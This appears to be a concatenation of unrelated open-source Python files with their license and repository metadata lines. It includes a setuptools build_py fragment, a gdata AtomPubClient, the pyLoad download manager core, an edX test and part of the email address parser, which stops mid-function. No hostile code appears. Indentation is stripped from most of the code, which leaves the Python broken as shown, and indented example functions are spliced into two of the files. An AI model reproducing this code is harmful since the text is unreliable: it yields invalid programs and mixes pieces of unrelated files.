srcfile = os.path.join(src_dir, filename)
outf, copied = self.copy_file(srcfile, target)
srcfile = os.path.abspath(srcfile)
if (copied and
srcfile in self.distribution.convert_2to3_doctests):
self.__doctests_2to3.append(outf)
def analyze_manifest(self):
self.manifest_files = mf = {}
if not self.distribution.include_package_data:
return
src_dirs = {}
for package in self.packages or ():
# Locate package source directory
src_dirs[assert_relative(self.get_package_dir(package))] = package
self.run_command('egg_info')
ei_cmd = self.get_finalized_command('egg_info')
for path in ei_cmd.filelist.files:
d, f = os.path.split(assert_relative(path))
prev = None
oldf = f
while d and d != prev and d not in src_dirs:
prev = d
d, df = os.path.split(d)
f = os.path.join(df, f)
if d in src_dirs:
if path.endswith('.py') and f == oldf:
continue # it's a module, not data
mf.setdefault(src_dirs[d], []).append(path)
def get_data_files(self):
pass # Lazily compute data files in _get_data_files() function.
def check_package(self, package, package_dir):
"""Check namespace packages' __init__ for declare_namespace"""
try:
return self.packages_checked[package]
except KeyError:
pass
init_py = orig.build_py.check_package(self, package, package_dir)
self.packages_checked[package] = init_py
if not init_py or not self.distribution.namespace_packages:
return init_py
for pkg in self.distribution.namespace_packages:
if pkg == package or pkg.startswith(package + '.'):
break
else:
return init_py
f = open(init_py, 'rbU')
if 'declare_namespace'.encode() not in f.read():
from distutils.errors import DistutilsError
raise DistutilsError(
"Namespace package problem: %s is a namespace package, but "
"its\n__init__.py does not call declare_namespace()! Please "
'fix it.\n(See the setuptools manual under '
'"Namespace Packages" for details.)\n"' % (package,)
)
f.close()
return init_py
def initialize_options(self):
self.packages_checked = {}
orig.build_py.initialize_options(self)
def get_package_dir(self, package):
res = orig.build_py.get_package_dir(self, package)
if self.distribution.src_root is not None:
return os.path.join(self.distribution.src_root, res)
return res
def exclude_data_files(self, package, src_dir, files):
"""Filter filenames for package's data files in 'src_dir'"""
globs = (self.exclude_package_data.get('', [])
+ self.exclude_package_data.get(package, []))
bad = []
for pattern in globs:
bad.extend(
fnmatch.filter(
files, os.path.join(src_dir, convert_path(pattern))
)
)
bad = dict.fromkeys(bad)
seen = {}
return [
f for f in files if f not in bad
and f not in seen and seen.setdefault(f, 1) # ditch dupes
]
def assert_relative(path):
if not os.path.isabs(path):
return path
from distutils.errors import DistutilsSetupError
msg = textwrap.dedent("""
Error: setup script specifies an absolute path:
%s
setup() arguments must *always* be /-separated paths relative to the
setup.py directory, *never* absolute paths.
""").lstrip() % path
raise DistutilsSetupError(msg)
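# Hypothetical usage sketch (not part of setuptools): the setup() arguments
# this enhanced build_py command consumes, with made-up package and file names.
# Wrapped in a function so nothing runs at import time.
def _example_setup_call():
    from setuptools import setup, find_packages
    return setup(
        name='example-package',
        version='0.1',
        packages=find_packages(),
        # package_data / exclude_package_data are what _get_data_files() and
        # build_package_data() above copy (or skip) into the build directory.
        package_data={'example_package': ['templates/*.html', 'data/*.json']},
        exclude_package_data={'example_package': ['data/private.json']},
    )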
|
lgpl-3.0
|
Godiyos/python-for-android
|
python3-alpha/extra_modules/atom/client.py
|
46
|
7854
|
#!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""AtomPubClient provides CRUD ops. in line with the Atom Publishing Protocol.
"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import atom.http_core
class Error(Exception):
pass
class MissingHost(Error):
pass
class AtomPubClient(object):
host = None
auth_token = None
ssl = False # Whether to force all requests over https
xoauth_requestor_id = None
def __init__(self, http_client=None, host=None, auth_token=None, source=None,
xoauth_requestor_id=None, **kwargs):
"""Creates a new AtomPubClient instance.
Args:
source: The name of your application.
http_client: An object capable of performing HTTP requests through a
request method. This object is used to perform the request
when the AtomPubClient's request method is called. Used to
allow HTTP requests to be directed to a mock server, or use
an alternate library instead of the default of httplib to
make HTTP requests.
host: str The default host name to use if a host is not specified in the
requested URI.
auth_token: An object which sets the HTTP Authorization header when its
modify_request method is called.
"""
self.http_client = http_client or atom.http_core.ProxiedHttpClient()
if host is not None:
self.host = host
if auth_token is not None:
self.auth_token = auth_token
self.xoauth_requestor_id = xoauth_requestor_id
self.source = source
def request(self, method=None, uri=None, auth_token=None,
http_request=None, **kwargs):
"""Performs an HTTP request to the server indicated.
Uses the http_client instance to make the request.
Args:
method: The HTTP method as a string, usually one of 'GET', 'POST',
'PUT', or 'DELETE'
uri: The URI desired as a string or atom.http_core.Uri.
http_request:
auth_token: An authorization token object whose modify_request method
sets the HTTP Authorization header.
Returns:
The results of calling self.http_client.request. With the default
http_client, this is an HTTP response object.
"""
# Modify the request based on the AtomPubClient settings and parameters
# passed in to the request.
http_request = self.modify_request(http_request)
if isinstance(uri, str):
uri = atom.http_core.Uri.parse_uri(uri)
if uri is not None:
uri.modify_request(http_request)
if isinstance(method, str):
http_request.method = method
# Any unrecognized arguments are assumed to be capable of modifying the
# HTTP request.
for name, value in kwargs.items():
if value is not None:
value.modify_request(http_request)
# Default to an http request if the protocol scheme is not set.
if http_request.uri.scheme is None:
http_request.uri.scheme = 'http'
# Override scheme. Force requests over https.
if self.ssl:
http_request.uri.scheme = 'https'
if http_request.uri.path is None:
http_request.uri.path = '/'
# Add the Authorization header at the very end. The Authorization header
# value may need to be calculated using information in the request.
if auth_token:
auth_token.modify_request(http_request)
elif self.auth_token:
self.auth_token.modify_request(http_request)
# Check to make sure there is a host in the http_request.
if http_request.uri.host is None:
raise MissingHost('No host provided in request %s %s' % (
http_request.method, str(http_request.uri)))
# Perform the fully specified request using the http_client instance.
# Sends the request to the server and returns the server's response.
return self.http_client.request(http_request)
Request = request
def get(self, uri=None, auth_token=None, http_request=None, **kwargs):
"""Performs a request using the GET method, returns an HTTP response."""
return self.request(method='GET', uri=uri, auth_token=auth_token,
http_request=http_request, **kwargs)
Get = get
def post(self, uri=None, data=None, auth_token=None, http_request=None,
**kwargs):
"""Sends data using the POST method, returns an HTTP response."""
return self.request(method='POST', uri=uri, auth_token=auth_token,
http_request=http_request, data=data, **kwargs)
Post = post
def put(self, uri=None, data=None, auth_token=None, http_request=None,
**kwargs):
"""Sends data using the PUT method, returns an HTTP response."""
return self.request(method='PUT', uri=uri, auth_token=auth_token,
http_request=http_request, data=data, **kwargs)
Put = put
def delete(self, uri=None, auth_token=None, http_request=None, **kwargs):
"""Performs a request using the DELETE method, returns an HTTP response."""
return self.request(method='DELETE', uri=uri, auth_token=auth_token,
http_request=http_request, **kwargs)
Delete = delete
def modify_request(self, http_request):
"""Changes the HTTP request before sending it to the server.
Sets the User-Agent HTTP header and fills in the HTTP host portion
of the URL if one was not included in the request (for this it uses
the self.host member if one is set). This method is called in
self.request.
Args:
http_request: An atom.http_core.HttpRequest() (optional) If one is
not provided, a new HttpRequest is instantiated.
Returns:
An atom.http_core.HttpRequest() with the User-Agent header set and
if this client has a value in its host member, the host in the request
URL is set.
"""
if http_request is None:
http_request = atom.http_core.HttpRequest()
if self.host is not None and http_request.uri.host is None:
http_request.uri.host = self.host
if self.xoauth_requestor_id is not None:
http_request.uri.query['xoauth_requestor_id'] = self.xoauth_requestor_id
# Set the user agent header for logging purposes.
if self.source:
http_request.headers['User-Agent'] = '%s gdata-py/2.0.16' % self.source
else:
http_request.headers['User-Agent'] = 'gdata-py/2.0.16'
return http_request
ModifyRequest = modify_request
class CustomHeaders(object):
"""Add custom headers to an http_request.
Usage:
>>> custom_headers = atom.client.CustomHeaders(header1='value1',
header2='value2')
>>> client.get(uri, custom_headers=custom_headers)
"""
def __init__(self, **kwargs):
"""Creates a CustomHeaders instance.
Initialize the headers dictionary with the arguments list.
"""
self.headers = kwargs
def modify_request(self, http_request):
"""Changes the HTTP request before sending it to the server.
Adds the custom headers to the HTTP request.
Args:
http_request: An atom.http_core.HttpRequest().
Returns:
An atom.http_core.HttpRequest() with the added custom headers.
"""
for name, value in self.headers.items():
if value is not None:
http_request.headers[name] = value
return http_request
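# A minimal usage sketch, assuming a reachable Atom service; the host and URI
# below ('example.com', 'http://example.com/feed') are placeholders.
def _example_get_feed():
    client = AtomPubClient(source='example-app', host='example.com')
    extra = CustomHeaders(Accept='application/atom+xml')
    # get() routes through request(); CustomHeaders.modify_request() adds the
    # Accept header before the request is handed to the http_client.
    return client.get('http://example.com/feed', custom_headers=extra)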
|
apache-2.0
|
kaarl/pyload
|
pyLoadCore.py
|
34
|
22485
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: spoob
@author: sebnapi
@author: RaNaN
@author: mkaay
@version: v0.4.9
"""
CURRENT_VERSION = '0.4.9'
import __builtin__
from getopt import getopt, GetoptError
import module.common.pylgettext as gettext
from imp import find_module
import logging
import logging.handlers
import os
from os import _exit, execl, getcwd, makedirs, remove, sep, walk, chdir, close
from os.path import exists, join
import signal
import subprocess
import sys
from sys import argv, executable, exit
from time import time, sleep
from traceback import print_exc
from module import InitHomeDir
from module.plugins.AccountManager import AccountManager
from module.CaptchaManager import CaptchaManager
from module.ConfigParser import ConfigParser
from module.plugins.PluginManager import PluginManager
from module.PullEvents import PullManager
from module.network.RequestFactory import RequestFactory
from module.web.ServerThread import WebServer
from module.Scheduler import Scheduler
from module.common.JsEngine import JsEngine
from module import remote
from module.remote.RemoteManager import RemoteManager
from module.database import DatabaseBackend, FileHandler
from module.utils import freeSpace, formatSize, get_console_encoding
from codecs import getwriter
enc = get_console_encoding(sys.stdout.encoding)
sys.stdout = getwriter(enc)(sys.stdout, errors="replace")
# TODO List
# - configurable auth system ldap/mysql
# - cron job like scheduler
class Core(object):
"""pyLoad Core, one tool to rule them all... (the filehosters) :D"""
def __init__(self):
self.doDebug = False
self.startedInGui = False
self.running = False
self.daemon = False
self.remote = True
self.arg_links = []
self.pidfile = "pyload.pid"
self.deleteLinks = False # will delete links on startup
if len(argv) > 1:
try:
options, args = getopt(argv[1:], 'vchdusqp:',
["version", "clear", "clean", "help", "debug", "user",
"setup", "configdir=", "changedir", "daemon",
"quit", "status", "no-remote","pidfile="])
for option, argument in options:
if option in ("-v", "--version"):
print "pyLoad", CURRENT_VERSION
exit()
elif option in ("-p", "--pidfile"):
self.pidfile = argument
elif option == "--daemon":
self.daemon = True
elif option in ("-c", "--clear"):
self.deleteLinks = True
elif option in ("-h", "--help"):
self.print_help()
exit()
elif option in ("-d", "--debug"):
self.doDebug = True
elif option in ("-u", "--user"):
from module.setup import Setup
self.config = ConfigParser()
s = Setup(pypath, self.config)
s.set_user()
exit()
elif option in ("-s", "--setup"):
from module.setup import Setup
self.config = ConfigParser()
s = Setup(pypath, self.config)
s.start()
exit()
elif option == "--changedir":
from module.setup import Setup
self.config = ConfigParser()
s = Setup(pypath, self.config)
s.conf_path(True)
exit()
elif option in ("-q", "--quit"):
self.quitInstance()
exit()
elif option == "--status":
pid = self.isAlreadyRunning()
if self.isAlreadyRunning():
print pid
exit(0)
else:
print "false"
exit(1)
elif option == "--clean":
self.cleanTree()
exit()
elif option == "--no-remote":
self.remote = False
except GetoptError:
print 'Unknown Argument(s) "%s"' % " ".join(argv[1:])
self.print_help()
exit()
def print_help(self):
print ""
print "pyLoad v%s 2008-2011 the pyLoad Team" % CURRENT_VERSION
print ""
if sys.argv[0].endswith(".py"):
print "Usage: python pyLoadCore.py [options]"
else:
print "Usage: pyLoadCore [options]"
print ""
print "<Options>"
print " -v, --version", " " * 10, "Print version to terminal"
print " -c, --clear", " " * 12, "Delete all saved packages/links"
#print " -a, --add=<link/list>", " " * 2, "Add the specified links"
print " -u, --user", " " * 13, "Manages users"
print " -d, --debug", " " * 12, "Enable debug mode"
print " -s, --setup", " " * 12, "Run Setup Assistent"
print " --configdir=<dir>", " " * 6, "Run with <dir> as config directory"
print " -p, --pidfile=<file>", " " * 3, "Set pidfile to <file>"
print " --changedir", " " * 12, "Change config dir permanently"
print " --daemon", " " * 15, "Daemonmize after start"
print " --no-remote", " " * 12, "Disable remote access (saves RAM)"
print " --status", " " * 15, "Display pid if running or False"
print " --clean", " " * 16, "Remove .pyc/.pyo files"
print " -q, --quit", " " * 13, "Quit running pyLoad instance"
print " -h, --help", " " * 13, "Display this help screen"
print ""
def toggle_pause(self):
if self.threadManager.pause:
self.threadManager.pause = False
return False
elif not self.threadManager.pause:
self.threadManager.pause = True
return True
def quit(self, a, b):
self.shutdown()
self.log.info(_("Received Quit signal"))
_exit(1)
def writePidFile(self):
self.deletePidFile()
pid = os.getpid()
f = open(self.pidfile, "wb")
f.write(str(pid))
f.close()
def deletePidFile(self):
if self.checkPidFile():
self.log.debug("Deleting old pidfile %s" % self.pidfile)
os.remove(self.pidfile)
def checkPidFile(self):
""" return pid as int or 0"""
if os.path.isfile(self.pidfile):
f = open(self.pidfile, "rb")
pid = f.read().strip()
f.close()
if pid:
pid = int(pid)
return pid
return 0
def isAlreadyRunning(self):
pid = self.checkPidFile()
if not pid or os.name == "nt": return False
try:
os.kill(pid, 0) # 0 - default signal (does nothing)
except:
return 0
return pid
def quitInstance(self):
if os.name == "nt":
print "Not supported on windows."
return
pid = self.isAlreadyRunning()
if not pid:
print "No pyLoad running."
return
try:
os.kill(pid, 3) #SIGQUIT
t = time()
print "waiting for pyLoad to quit"
while exists(self.pidfile) and t + 10 > time():
sleep(0.25)
if not exists(self.pidfile):
print "pyLoad successfully stopped"
else:
os.kill(pid, 9) #SIGKILL
print "pyLoad did not respond"
print "Kill signal was send to process with id %s" % pid
except:
print "Error quitting pyLoad"
def cleanTree(self):
for path, dirs, files in walk(self.path("")):
for f in files:
if not f.endswith(".pyo") and not f.endswith(".pyc"):
continue
if "_25" in f or "_26" in f or "_27" in f:
continue
print join(path, f)
remove(join(path, f))
def start(self, rpc=True, web=True):
""" starts the fun :D """
self.version = CURRENT_VERSION
if not exists("pyload.conf"):
from module.setup import Setup
print "This is your first start, running configuration assistent now."
self.config = ConfigParser()
s = Setup(pypath, self.config)
res = False
try:
res = s.start()
except SystemExit:
pass
except KeyboardInterrupt:
print "\nSetup interrupted"
except:
res = False
print_exc()
print "Setup failed"
if not res:
remove("pyload.conf")
exit()
try: signal.signal(signal.SIGQUIT, self.quit)
except: pass
self.config = ConfigParser()
gettext.setpaths([join(os.sep, "usr", "share", "pyload", "locale"), None])
translation = gettext.translation("pyLoad", self.path("locale"),
languages=[self.config['general']['language'],"en"],fallback=True)
translation.install(True)
self.debug = self.doDebug or self.config['general']['debug_mode']
self.remote &= self.config['remote']['activated']
pid = self.isAlreadyRunning()
if pid:
print _("pyLoad already running with pid %s") % pid
exit()
if os.name != "nt" and self.config["general"]["renice"]:
os.system("renice %d %d" % (self.config["general"]["renice"], os.getpid()))
if self.config["permission"]["change_group"]:
if os.name != "nt":
try:
from grp import getgrnam
group = getgrnam(self.config["permission"]["group"])
os.setgid(group[2])
except Exception, e:
print _("Failed changing group: %s") % e
if self.config["permission"]["change_user"]:
if os.name != "nt":
try:
from pwd import getpwnam
user = getpwnam(self.config["permission"]["user"])
os.setuid(user[2])
except Exception, e:
print _("Failed changing user: %s") % e
self.check_file(self.config['log']['log_folder'], _("folder for logs"), True)
if self.debug:
self.init_logger(logging.DEBUG) # logging level
else:
self.init_logger(logging.INFO) # logging level
self.do_kill = False
self.do_restart = False
self.shuttedDown = False
self.log.info(_("Starting") + " pyLoad %s" % CURRENT_VERSION)
self.log.info(_("Using home directory: %s") % getcwd())
self.writePidFile()
#@TODO refactor
remote.activated = self.remote
self.log.debug("Remote activated: %s" % self.remote)
self.check_install("Crypto", _("pycrypto to decode container files"))
#img = self.check_install("Image", _("Python Image Libary (PIL) for captcha reading"))
#self.check_install("pycurl", _("pycurl to download any files"), True, True)
self.check_file("tmp", _("folder for temporary files"), True)
#tesser = self.check_install("tesseract", _("tesseract for captcha reading"), False) if os.name != "nt" else True
self.captcha = True # check seems to fail, although tesseract is available
self.check_file(self.config['general']['download_folder'], _("folder for downloads"), True)
if self.config['ssl']['activated']:
self.check_install("OpenSSL", _("OpenSSL for secure connection"))
self.setupDB()
if self.config.oldRemoteData:
self.log.info(_("Moving old user config to DB"))
self.db.addUser(self.config.oldRemoteData["username"], self.config.oldRemoteData["password"])
self.log.info(_("Please check your logindata with ./pyLoadCore.py -u"))
if self.deleteLinks:
self.log.info(_("All links removed"))
self.db.purgeLinks()
self.requestFactory = RequestFactory(self)
__builtin__.pyreq = self.requestFactory
self.lastClientConnected = 0
# later imported because they would trigger api import, and remote value not set correctly
from module import Api
from module.HookManager import HookManager
from module.ThreadManager import ThreadManager
if Api.activated != self.remote:
self.log.warning("Import error: API remote status not correct.")
self.api = Api.Api(self)
self.scheduler = Scheduler(self)
#hell yeah, so many important managers :D
self.pluginManager = PluginManager(self)
self.pullManager = PullManager(self)
self.accountManager = AccountManager(self)
self.threadManager = ThreadManager(self)
self.captchaManager = CaptchaManager(self)
self.hookManager = HookManager(self)
self.remoteManager = RemoteManager(self)
self.js = JsEngine()
self.log.info(_("Downloadtime: %s") % self.api.isTimeDownload())
if rpc:
self.remoteManager.startBackends()
if web:
self.init_webserver()
spaceLeft = freeSpace(self.config["general"]["download_folder"])
self.log.info(_("Free space: %s") % formatSize(spaceLeft))
self.config.save() #save so config file gets filled
link_file = join(pypath, "links.txt")
if exists(link_file):
f = open(link_file, "rb")
if f.read().strip():
self.api.addPackage("links.txt", [link_file], 1)
f.close()
link_file = "links.txt"
if exists(link_file):
f = open(link_file, "rb")
if f.read().strip():
self.api.addPackage("links.txt", [link_file], 1)
f.close()
#self.scheduler.addJob(0, self.accountManager.getAccountInfos)
self.log.info(_("Activating Accounts..."))
self.accountManager.getAccountInfos()
self.threadManager.pause = False
self.running = True
self.log.info(_("Activating Plugins..."))
self.hookManager.coreReady()
self.log.info(_("pyLoad is up and running"))
#test api
# from module.common.APIExerciser import startApiExerciser
# startApiExerciser(self, 3)
#some memory stats
# from guppy import hpy
# hp=hpy()
# import objgraph
# objgraph.show_most_common_types(limit=20)
# import memdebug
# memdebug.start(8002)
locals().clear()
while True:
sleep(2)
if self.do_restart:
self.log.info(_("restarting pyLoad"))
self.restart()
if self.do_kill:
self.shutdown()
self.log.info(_("pyLoad quits"))
self.removeLogger()
_exit(0) #@TODO thrift blocks shutdown
self.threadManager.work()
self.scheduler.work()
def setupDB(self):
self.db = DatabaseBackend(self) # the backend
self.db.setup()
self.files = FileHandler(self)
self.db.manager = self.files #ugly?
def init_webserver(self):
if self.config['webinterface']['activated']:
self.webserver = WebServer(self)
self.webserver.start()
def init_logger(self, level):
console = logging.StreamHandler(sys.stdout)
frm = logging.Formatter("%(asctime)s %(levelname)-8s %(message)s", "%d.%m.%Y %H:%M:%S")
console.setFormatter(frm)
self.log = logging.getLogger("log") # settable in config
if self.config['log']['file_log']:
if self.config['log']['log_rotate']:
file_handler = logging.handlers.RotatingFileHandler(join(self.config['log']['log_folder'], 'log.txt'),
maxBytes=self.config['log']['log_size'] * 1024,
backupCount=int(self.config['log']['log_count']),
encoding="utf8")
else:
file_handler = logging.FileHandler(join(self.config['log']['log_folder'], 'log.txt'), encoding="utf8")
file_handler.setFormatter(frm)
self.log.addHandler(file_handler)
self.log.addHandler(console) #if console logging
self.log.setLevel(level)
def removeLogger(self):
for h in list(self.log.handlers):
self.log.removeHandler(h)
h.close()
def check_install(self, check_name, legend, python=True, essential=False):
"""check wether needed tools are installed"""
try:
if python:
find_module(check_name)
else:
pipe = subprocess.PIPE
subprocess.Popen(check_name, stdout=pipe, stderr=pipe)
return True
except:
if essential:
self.log.info(_("Install %s") % legend)
exit()
return False
def check_file(self, check_names, description="", folder=False, empty=True, essential=False, quiet=False):
"""check wether needed files exists"""
tmp_names = []
if not type(check_names) == list:
tmp_names.append(check_names)
else:
tmp_names.extend(check_names)
file_created = True
file_exists = True
for tmp_name in tmp_names:
if not exists(tmp_name):
file_exists = False
if empty:
try:
if folder:
tmp_name = tmp_name.replace("/", sep)
makedirs(tmp_name)
else:
open(tmp_name, "w")
except:
file_created = False
else:
file_created = False
if not file_exists and not quiet:
if file_created:
#self.log.info( _("%s created") % description )
pass
else:
if not empty:
self.log.warning(
_("could not find %(desc)s: %(name)s") % {"desc": description, "name": tmp_name})
else:
print _("could not create %(desc)s: %(name)s") % {"desc": description, "name": tmp_name}
if essential:
exit()
def isClientConnected(self):
return (self.lastClientConnected + 30) > time()
def restart(self):
self.shutdown()
chdir(owd)
# close some open fds
for i in range(3,50):
try:
close(i)
except :
pass
execl(executable, executable, *sys.argv)
_exit(0)
def shutdown(self):
self.log.info(_("shutting down..."))
try:
if self.config['webinterface']['activated'] and hasattr(self, "webserver"):
self.webserver.quit()
for thread in self.threadManager.threads:
thread.put("quit")
pyfiles = self.files.cache.values()
for pyfile in pyfiles:
pyfile.abortDownload()
self.hookManager.coreExiting()
except:
if self.debug:
print_exc()
self.log.info(_("error while shutting down"))
finally:
self.files.syncSave()
self.shuttedDown = True
self.deletePidFile()
def path(self, *args):
return join(pypath, *args)
def daemon():
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError, e:
print >> sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# decouple from parent environment
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent, print eventual PID before
print "Daemon PID %d" % pid
sys.exit(0)
except OSError, e:
print >> sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# Iterate through and close some file descriptors.
for fd in range(0, 3):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(os.devnull, os.O_RDWR) # standard input (0)
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2)
pyload_core = Core()
pyload_core.start()
def main():
#change name to 'pyLoadCore'
#from module.lib.rename_process import renameProcess
#renameProcess('pyLoadCore')
if "--daemon" in sys.argv:
daemon()
else:
pyload_core = Core()
try:
pyload_core.start()
except KeyboardInterrupt:
pyload_core.shutdown()
pyload_core.log.info(_("killed pyLoad from Terminal"))
pyload_core.removeLogger()
_exit(1)
# And so it begins...
if __name__ == "__main__":
main()
|
gpl-3.0
|
jolyonb/edx-platform
|
lms/djangoapps/mobile_api/tests/test_context_processor.py
|
2
|
1087
|
"""
Tests for Django template context processors.
"""
from __future__ import absolute_import
from django.conf import settings
from django.test import TestCase
from django.test.client import RequestFactory
from lms.djangoapps.mobile_api.context_processor import is_from_mobile_app
class MobileContextProcessorTests(TestCase):
"""
Tests for the configuration context processor.
"""
def test_is_from_mobile_app(self):
"""
Verify the context is from mobile app.
"""
request = RequestFactory().get('/')
request.META['HTTP_USER_AGENT'] = settings.MOBILE_APP_USER_AGENT_REGEXES[0]
context = is_from_mobile_app(request)
self.assertEqual(context['is_from_mobile_app'], True)
def test_not_is_from_mobile_app(self):
"""
Verify the context is not from the mobile app.
"""
request = RequestFactory().get('/')
request.META['HTTP_USER_AGENT'] = "Not from the mobile app"
context = is_from_mobile_app(request)
self.assertEqual(context['is_from_mobile_app'], False)
|
agpl-3.0
|
msebire/intellij-community
|
python/lib/Lib/email/_parseaddr.py
|
92
|
14987
|
# Copyright (C) 2002-2007 Python Software Foundation
# Contact: email-sig@python.org
"""Email address parsing code.
Lifted directly from rfc822.py. This should eventually be rewritten.
"""
__all__ = [
'mktime_tz',
'parsedate',
'parsedate_tz',
'quote',
]
import time
SPACE = ' '
EMPTYSTRING = ''
COMMASPACE = ', '
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
data = data.split()
# The FWS after the comma after the day-of-week is optional, so search and
# adjust for this.
if data[0].endswith(',') or data[0].lower() in _daynames:
# There's a dayname here. Skip it
del data[0]
else:
i = data[0].rfind(',')
if i >= 0:
data[0] = data[0][i+1:]
if len(data) == 3: # RFC 850 date, deprecated
stuff = data[0].split('-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = s.find('+')
if i > 0:
data[3:] = [s[:i], s[i+1:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = mm.lower()
if mm not in _monthnames:
dd, mm = mm, dd.lower()
if mm not in _monthnames:
return None
mm = _monthnames.index(mm) + 1
if mm > 12:
mm -= 12
if dd[-1] == ',':
dd = dd[:-1]
i = yy.find(':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if not yy[0].isdigit():
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = tm.split(':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = int(yy)
dd = int(dd)
thh = int(thh)
tmm = int(tmm)
tss = int(tss)
except ValueError:
return None
tzoffset = None
tz = tz.upper()
if _timezones.has_key(tz):
tzoffset = _timezones[tz]
else:
try:
tzoffset = int(tz)
except ValueError:
pass
# Convert a timezone offset into seconds ; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
# Daylight Saving Time flag is set to -1, since DST is unknown.
return yy, mm, dd, thh, tmm, tss, 0, 1, -1, tzoffset
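# A worked example of the returned layout, with a placeholder RFC 2822 date:
#   parsedate_tz('Mon, 16 Nov 2009 13:32:02 +0100')
#   -> (2009, 11, 16, 13, 32, 2, 0, 1, -1, 3600)
# i.e. year, month, day, hour, minute, second, the fixed wday/yday/dst
# placeholders, and the timezone offset in seconds east of UTC.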
def parsedate(data):
"""Convert a time string to a time tuple."""
t = parsedate_tz(data)
if isinstance(t, tuple):
return t[:9]
else:
return t
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
def quote(str):
"""Add quotes around a string."""
return str.replace('\\', '\\\\').replace('"', '\\"')
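# For example, quote('say "hi"') returns 'say \\"hi\\"': backslashes and double
# quotes gain a leading backslash so the value can sit inside a quoted-string.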
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of RFC 2822 in
front of you.
Note: this class interface is deprecated and may be removed in the future.
Use rfc822.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing
one or more addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.FWS = self.LWS + self.CR
self.atomends = self.specials + self.LWS + self.CR
# Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
# is obsolete syntax. RFC 2822 requires that we recognize obsolete
# syntax, so allow dots in phrases.
self.phraseends = self.atomends.replace('.', '')
self.field = field
self.commentlist = []
def gotonext(self):
"""Parse up to the start of the next address."""
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else:
break
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
result = []
while self.pos < len(self.field):
ad = self.getaddress()
if ad:
result += ad
else:
result.append(('', ''))
return result
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(SPACE.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
fieldlen = len(self.field)
self.pos += 1
while self.pos < len(self.field):
self.gotonext()
if self.pos < fieldlen and self.field[self.pos] == ';':
self.pos += 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(SPACE.join(plist) + ' (' +
' '.join(self.commentlist) + ')', routeaddr)]
else:
returnlist = [(SPACE.join(plist), routeaddr)]
else:
if plist:
